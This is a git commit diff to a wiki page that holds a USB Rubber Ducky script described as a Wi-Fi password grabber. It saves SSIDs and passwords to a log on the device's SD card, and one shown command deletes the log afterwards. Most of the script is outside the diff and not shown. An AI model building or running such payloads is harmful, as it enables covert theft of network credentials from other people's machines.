Updated Need help please. (Rubber Ducky)(Network info grabber) (markdown)

This commit is contained in:
berkeley_blue 2017-07-02 05:52:48 +03:00
parent 908d29d010
commit ab26f1e712
1 changed files with 2 additions and 2 deletions

View File

@ -1,4 +1,4 @@
REM Title: WiFi password grabber save to twin duck SD
`REM Title: WiFi password grabber save to twin duck SD
REM Author: silent_noise
REM Original by: Siem
REM Description: Saves the SSID, Network type, Authentication and the password to Log.txt. Then saves to the CD card on the twin duck
@ -71,7 +71,7 @@ DELAY 500
REM --> Delete Log.txt and exit
STRING del Log.txt & exit
ENTER
`